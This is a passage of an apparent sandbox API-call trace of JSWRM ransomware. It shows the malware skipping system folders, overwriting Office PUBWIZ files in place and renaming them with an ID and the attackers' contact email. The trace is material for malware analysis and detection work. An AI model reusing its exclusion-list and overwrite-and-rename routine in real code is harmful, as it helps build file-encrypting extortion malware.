lpNumberOfBytesWritten=0x345e898*=0x6080, lpOverlapped=0x0) returned 1 [0141.026] CloseHandle (hObject=0x238) returned 1 [0141.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.027] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x282, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCOUPON.XML", cAlternateFileName="")) returned 1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2=".") returned 1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="..") returned 1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="...") returned 1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="windows") returned -1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="recovery") returned -1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="perflogs") returned -1 [0141.027] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="documents and settings") returned -1 [0141.028] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.028] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="system volume information") returned -1 [0141.028] lstrcmpiW (lpString1="DGCOUPON.XML", lpString2="msocache") returned -1 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCOUPON.XML", lpUsedDefaultChar=0x0) returned 12 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCOUPON.XML", lpUsedDefaultChar=0x0) returned 12 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.029] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=642) returned 1 [0141.029] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.029] ReadFile (in: hFile=0x238, lpBuffer=0x20e9d0, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e9d0*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0141.030] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.030] WriteFile (in: hFile=0x238, lpBuffer=0x20e9d0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e9d0*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0141.030] CloseHandle (hObject=0x238) returned 1 [0141.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.033] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGDOTS.DPV", cAlternateFileName="")) returned 1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2=".") returned 1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="..") returned 1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="...") returned 1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="windows") returned -1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="recovery") returned -1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="perflogs") returned -1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="documents and settings") returned -1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="system volume information") returned -1 [0141.033] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="msocache") returned -1 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGDOTS.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGDOTS.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.034] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6144) returned 1 [0141.034] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.034] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1800, lpOverlapped=0x0) returned 1 [0141.036] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.036] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1800, lpOverlapped=0x0) returned 1 [0141.036] CloseHandle (hObject=0x238) returned 1 [0141.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.038] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGDOTS.XML", cAlternateFileName="")) returned 1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2=".") returned 1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="..") returned 1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="...") returned 1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="windows") returned -1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="recovery") returned -1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="perflogs") returned -1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="documents and settings") returned -1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="system volume information") returned -1 [0141.038] lstrcmpiW (lpString1="DGDOTS.XML", lpString2="msocache") returned -1 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGDOTS.XML", lpUsedDefaultChar=0x0) returned 10 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGDOTS.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGDOTS.XML", lpUsedDefaultChar=0x0) returned 10 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.039] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=690) returned 1 [0141.039] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.039] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x2b0, lpOverlapped=0x0) returned 1 [0141.040] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.040] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x2b0, lpOverlapped=0x0) returned 1 [0141.040] CloseHandle (hObject=0x238) returned 1 [0141.040] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGDOTS.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgdots.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.042] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ba4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGHEADING.XML", cAlternateFileName="DGHEAD~1.XML")) returned 1 [0141.042] lstrcmpiW (lpString1="DGHEADING.XML", lpString2=".") returned 1 [0141.042] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="..") returned 1 [0141.042] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="...") returned 1 [0141.042] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="windows") returned -1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="recovery") returned -1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="perflogs") returned -1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="documents and settings") returned -1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="system volume information") returned -1 [0141.043] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="msocache") returned -1 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGHEADING.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGHEADING.XML", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGHEADING.XML", lpUsedDefaultChar=0x0) returned 13 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGHEADING.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGHEADING.XML", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGHEADING.XML", lpUsedDefaultChar=0x0) returned 13 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGHEADING.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgheading.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.044] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7076) returned 1 [0141.044] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.044] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1ba0, lpOverlapped=0x0) returned 1 [0141.046] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.046] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1ba0, lpOverlapped=0x0) returned 1 [0141.046] CloseHandle (hObject=0x238) returned 1 [0141.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGHEADING.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgheading.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGHEADING.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgheading.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.047] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGLINACC.DPV", cAlternateFileName="")) returned 1 [0141.047] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2=".") returned 1 [0141.047] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="..") returned 1 [0141.047] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="...") returned 1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="windows") returned -1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="recovery") returned -1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="perflogs") returned -1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="documents and settings") returned -1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="system volume information") returned -1 [0141.048] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="msocache") returned -1 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLINACC.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLINACC.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.049] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9216) returned 1 [0141.049] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.049] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2400, lpOverlapped=0x0) returned 1 [0141.051] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.051] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2400, lpOverlapped=0x0) returned 1 [0141.052] CloseHandle (hObject=0x238) returned 1 [0141.052] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.053] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGLINACC.XML", cAlternateFileName="")) returned 1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2=".") returned 1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="..") returned 1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="...") returned 1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="windows") returned -1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="recovery") returned -1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="perflogs") returned -1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="documents and settings") returned -1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="$RECYCLE.BIN") returned 1 